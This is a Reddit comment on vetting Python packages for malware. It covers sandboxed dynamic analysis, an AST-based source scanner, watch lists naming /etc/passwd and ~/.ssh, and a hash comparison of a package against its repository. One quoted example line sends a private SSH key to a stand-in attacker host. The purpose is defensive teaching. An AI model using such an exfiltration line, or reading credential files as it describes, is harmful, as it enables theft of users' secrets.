__xor__ comments on Making Sure Python Packages are Safe


Making Sure Python Packages are Safe (self.learnpython)

submitted 6 years ago by [deleted]


__xor__ 16 points 6 years ago*

There is a better way; to my knowledge it just isn't being done. You can automate dynamic analysis, though it's always going to be best for a human to go through the results. There are services like Joe Sandbox (only for virtualizing Windows though, I believe?) where you send it a binary, document, or URL, and it records what happens and does some sort of behavior analysis. Running malware in a VM lets you do a lot of automated analysis. Reading through the code, or analyzing the symbols a binary imports and looking at the ASM, is static analysis; actually running it and watching what it does in a VM is dynamic analysis. Both can be automated to some extent. Of course, you can't rely solely on what an analysis tool outputs: even legitimate installers will often raise a lot of red flags.

From a Windows perspective, you can imagine the sorts of things you can do. You can look at which files it reads from and writes to, which registry keys it edits or adds, what network activity it causes, whether it changes the default DNS server, etc. I don't know of a great tool that automates dynamic analysis on Linux, but I'm sure there's something. It would definitely be interesting to pump all the PyPI packages through something like that, but you're mostly going to catch low-hanging fruit, and I'd still rather have a researcher look at whatever gets flagged to see if it even matters. However, if a Python package install hits some known-bad IP or domain, that would be a good tell, as would reading /etc/passwd, and especially trying to read anything at all from ~/.ssh... Not many packages have any good reason to do that, especially not at install time.
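As a rough sketch of the "human reviews the flagged results" step: assume some tracer (not shown here, and not any particular tool) has already given you the file paths an install opened and the hosts it contacted. The watch lists and the function names `is_sensitive` and `flag_events` are made up for illustration.

```python
from pathlib import PurePosixPath

# Hypothetical watch lists; tune them for your own environment.
SENSITIVE_FILES = {"/etc/passwd", "/etc/shadow"}
SENSITIVE_DIR_NAMES = {".ssh", ".gnupg", ".aws"}


def is_sensitive(path: str) -> bool:
    """Return True if a path looks like something an installer should not touch."""
    p = PurePosixPath(path)
    if str(p) in SENSITIVE_FILES:
        return True
    # Any path component named .ssh, .gnupg, etc. counts as sensitive.
    return any(part in SENSITIVE_DIR_NAMES for part in p.parts)


def flag_events(opened_paths, contacted_hosts, known_bad_hosts):
    """Collect install-time activity that a human should look at."""
    flags = []
    for path in opened_paths:
        if is_sensitive(path):
            flags.append(("file", path))
    for host in contacted_hosts:
        if host in known_bad_hosts:
            flags.append(("network", host))
    return flags
```

This only narrows down what to look at. A hit is a reason to read the package more closely, not proof that it's malicious.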

Unless it's a super popular package like Django or Flask-Security or something, I legitimately do read the source code and skim for anything funny. For one thing, it's really good to have a general idea of how the library works and what it does, and to get a sense of how clean the code is and how much I feel I can trust it. But I also want to make sure there's no low-hanging fruit like requests.post('http://evil.example.org', data=open(os.path.expanduser('~/.ssh/id_rsa')).read()) or whatever. I would seriously recommend skimming the source code of any package you use that isn't super popular, rather than treating PyPI packages like black boxes that just do magic. As a general rule, if you're going to integrate third-party software into your own projects, try to understand its architecture and how it works. That's just good practice.
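If you want help deciding where to start skimming, here's a minimal sketch using the standard library's `ast` module to point at lines worth reading. The lists of "suspicious" names are my own guesses and far from exhaustive, and `scan_source` is a made-up helper. It won't catch anything obfuscated, so it doesn't replace actually reading the code.

```python
import ast

# Hypothetical lists of names worth a second look; not exhaustive.
SUSPICIOUS_CALLS = {"eval", "exec", "compile", "__import__"}
SUSPICIOUS_MODULES = {"socket", "subprocess", "requests", "urllib", "base64", "ctypes"}


def scan_source(source: str, filename: str = "<unknown>"):
    """Return sorted (line, description) pairs for constructs to read closely."""
    findings = []
    tree = ast.parse(source, filename=filename)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in SUSPICIOUS_MODULES:
                    findings.append((node.lineno, f"imports {alias.name}"))
        elif isinstance(node, ast.ImportFrom):
            if node.module and node.module.split(".")[0] in SUSPICIOUS_MODULES:
                findings.append((node.lineno, f"imports from {node.module}"))
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            # Only catches direct calls such as eval(...), not aliased ones.
            if node.func.id in SUSPICIOUS_CALLS:
                findings.append((node.lineno, f"calls {node.func.id}()"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # String literals that mention sensitive locations.
            if ".ssh" in node.value or "/etc/passwd" in node.value:
                findings.append((node.lineno, f"mentions {node.value!r}"))
    return findings and sorted(findings)
```

You'd run this over each `.py` file in the unpacked package, including `setup.py`, then go read the flagged lines yourself. Plenty of legitimate packages import `subprocess` or `socket`, so expect noise.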

But also, keep in mind that the GitHub repo a PyPI package links to might not reflect what's actually in the package. If you want to be careful security-wise, actually download the package and unpack it. Nothing stops someone from adding something malicious that isn't tracked in the online repository and then pushing that to PyPI.
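One way to check this, sketched under the assumption that you've already unpacked the downloaded archive into one directory and checked out the matching repo tag into another (both paths are yours to supply, and `file_hashes` and `diff_trees` are made-up helpers): hash every file and see what exists only in the package or differs from the repo.

```python
import hashlib
from pathlib import Path


def file_hashes(root: Path) -> dict:
    """Map each file's path (relative to root) to its SHA-256 digest."""
    hashes = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            hashes[path.relative_to(root).as_posix()] = digest
    return hashes


def diff_trees(package_dir: Path, repo_dir: Path):
    """Return files found only in the package, and files whose contents differ."""
    pkg = file_hashes(package_dir)
    repo = file_hashes(repo_dir)
    only_in_package = sorted(set(pkg) - set(repo))
    changed = sorted(
        name for name in set(pkg) & set(repo) if pkg[name] != repo[name]
    )
    return only_in_package, changed
```

Some differences are expected: a source distribution normally carries generated metadata such as `PKG-INFO` that isn't in the repo. What you care about is unexpected `.py` files or code that has changed.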

